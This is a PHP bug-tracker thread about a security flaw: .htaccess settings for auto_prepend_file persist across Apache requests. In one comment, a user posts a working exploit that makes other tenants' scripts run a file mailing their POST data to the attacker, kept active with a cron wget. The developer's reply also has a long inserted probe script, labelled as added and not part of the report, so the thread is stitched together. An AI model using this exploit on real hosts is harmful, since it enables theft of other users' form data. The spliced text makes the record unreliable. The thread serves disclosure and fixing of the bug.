ID:               31844
 Updated by:       [EMAIL PROTECTED]
 Reported By:      phpbugrep-20050204 at pgregg dot com
-Status:           Open
+Status:           Feedback
 Bug Type:         *Web Server problem
 Operating System: All
 PHP Version:      Irrelevant
 New Comment:

So have you actually verified that this happens with Apache1+PHP4.x? 
I'll test other versions as well, but I just tested that combination
and auto_prepend_file is getting reset correctly there.  If it only
happens on certain server versions or certain PHP versions, please
provide those versions so we have a chance to verify this.  

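One way to answer the verification question above is a probe script a hosting administrator can deploy next to the affected vhosts. It is an added example, not code from this bug report or from PHP itself. It assumes the probe lives in a directory with no `php_value` override for `auto_prepend_file` or `auto_append_file`, so that any non-empty value it observes must have been carried over from an earlier request handled by the same Apache child; `getmypid()` is printed so the two requests can be matched.

```php
<?php
// probe.php (added example, not part of the bug report): report the
// effective INI state of this request so a value left over from a previous
// request's .htaccess can be spotted.  Deploy in a directory with NO
// php_value overrides for the settings watched below.
header('Content-Type: text/plain');

// The two settings the report says are not reset between requests.
$watched = array('auto_prepend_file', 'auto_append_file');

$leaked = array();
foreach ($watched as $name) {
    $value = ini_get($name);
    // With no override in effect the value must be empty; anything else
    // was inherited from an earlier request served by this child process.
    if ($value !== '' && $value !== false) {
        $leaked[$name] = $value;
    }
}

echo 'pid=' . getmypid() . "\n";   // lets you match this request to the child
foreach ($watched as $name) {
    echo $name . '=' . var_export(ini_get($name), true) . "\n";
}
echo count($leaked) > 0
    ? "RESULT: leaked INI state detected\n"
    : "RESULT: clean\n";
```

Usage: first request a script in a directory whose `.htaccess` sets `php_value auto_prepend_file`, then request `probe.php` repeatedly until a response reports the same `pid`. A `leaked` result on that response reproduces the reporter's claim for that server and PHP version; a `clean` result means the per-request reset worked for that child. Because the outcome depends on which child serves each request, repeat the pair several times before concluding either way.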

Previous Comments:
------------------------------------------------------------------------

[2005-02-04 19:02:41] kevinphpdotnet at stormtide dot ca

Working example exploit. Because the auto-prepend is not reset we can
add exploit.php to other scripts (even ones we don't own) provided that
we are the first request to a child thread.

--------  .htaccess --------

php_value auto_prepend_file exploit.php

-------- exploit.php --------

<?php
if($_SERVER['REQUEST_METHOD'] == "POST") {
        mail("[EMAIL PROTECTED]", "Values", var_export($_POST));
}
?>

-------- legit.php -----------
<?PHP
echo "a";
?>


---- cron entry elsewhere ----

wget http://www.mywebhotel.com/legit.php 

set every minute

------------------------------------------------------------------------

[2005-02-04 13:03:39] phpbugrep-20050204 at pgregg dot com

Description:
------------
SECURITY ALERT:

Related to: http://bugs.php.net/bug.php?id=28729
http://bugs.php.net/bug.php?id=27110

(First the rant) This isn't the same bug... and to be honest I'm
getting quite pissed at the amount of times a bug is reported only to
be closed as Bogus because dev can't be arsed to look into it.  This
just results in people not bothering to report bugs.


In this case, the auto_prepend_file and auto_append_file values are not
reset between requests.  Thus one change in a .htaccess file results in
the change lingering on for the next request (perhaps even on a
different vhost).   

This could be a very nasty security issue because it lets me, in a web
hotel, insert code into other people websites, such as emailing me
$GLOBALS so I could extract credit card details, etc.

I believe the fix is in main/main.c (in 5.0.3) in php_module_startup()
to add:
 PG(auto_prepend_file) = NULL;
 PG(auto_append_file) = NULL;
The same will be the case in the 4.x tree.

The same should be true for other "leaking" values.

As a workaround setting the Apache MaxRequests to 1 will result in a
fresh apache and as a result a fresh php. The hit is poor performance.

------------------------------------------------------------------------


-- 
Edit this bug report at http://bugs.php.net/?id=31844&edit=1